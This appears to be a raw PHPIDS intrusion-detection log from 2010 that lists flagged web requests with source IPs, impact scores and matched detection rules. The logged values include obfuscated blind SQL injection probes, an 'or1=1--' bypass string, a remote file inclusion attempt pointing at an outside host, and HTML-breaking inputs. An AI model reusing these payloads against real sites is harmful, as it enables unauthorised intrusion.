Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:46
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123277
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:45
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123278
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:45
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123279
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:45
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123280
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:45
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123275
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123276
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123273
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123274
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123271
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:27
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123272
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:27
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123269
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123270
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123267
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:23
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123268
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:23
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123265
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:21
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123266
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:21
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123263
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:20
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123264
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:20
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123261
Name:REQUEST.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:66.249.67.227
Impact:10
Created:2010-05-03 01:13:18
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:123262
Name:GET.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:66.249.67.227
Impact:10
Created:2010-05-03 01:13:18
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:123259
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123260
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123257
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:12
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123258
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:12
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123255
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:10
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123256
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:10
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123253
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:09
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123254
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:09
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123251
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123252
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 01:13:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123249
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:07
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123250
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:07
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123247
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:06
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123248
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:06
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123245
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:02
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123246
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:02
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123243
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:01
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123244
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 01:13:01
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123241
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:60.4.51.66
Impact:24
Created:2010-05-03 01:12:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123242
Name:GET.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:60.4.51.66
Impact:24
Created:2010-05-03 01:12:52
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123239
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:80.98.105.208
Impact:10
Created:2010-05-02 22:56:13
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123240
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:80.98.105.208
Impact:10
Created:2010-05-02 22:56:13
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123237
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-05-02 14:43:32
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123238
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-05-02 14:43:32
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123235
Name:REQUEST.page
Value:videos/samdump2auditor%3C/a%3E%3Cbr%20/%3E%3Ca%20href=
Page:/i.php?page=videos/samdump2auditor%253C/a%253E%253Cbr%2520/%253E%253Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 14:32:33
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123236
Name:GET.page
Value:videos/samdump2auditor%3C/a%3E%3Cbr%20/%3E%3Ca%20href=
Page:/i.php?page=videos/samdump2auditor%253C/a%253E%253Cbr%2520/%253E%253Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 14:32:33
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123233
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123234
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:44
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123231
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123232
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123229
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:03
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123230
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:54:03
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123227
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:52:19
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123228
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:52:19
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123225
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123226
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:58
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123223
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:37
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123224
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:37
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123221
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:17
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123222
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:51:17
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123219
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:50:07
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123220
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:50:07
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123217
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:46
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123218
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:46
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123215
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:25
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123216
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:25
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123213
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:05
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123214
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-02 11:49:05
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123211
Name:REQUEST.page
Value:videos/samdump2auditor</a><br%20/><a%20href=
Page:/i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 05:57:28
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123212
Name:GET.page
Value:videos/samdump2auditor</a><br%20/><a%20href=
Page:/i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 05:57:28
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123209
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-05-02 05:20:34
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123210
Name:GET.page
Value:''
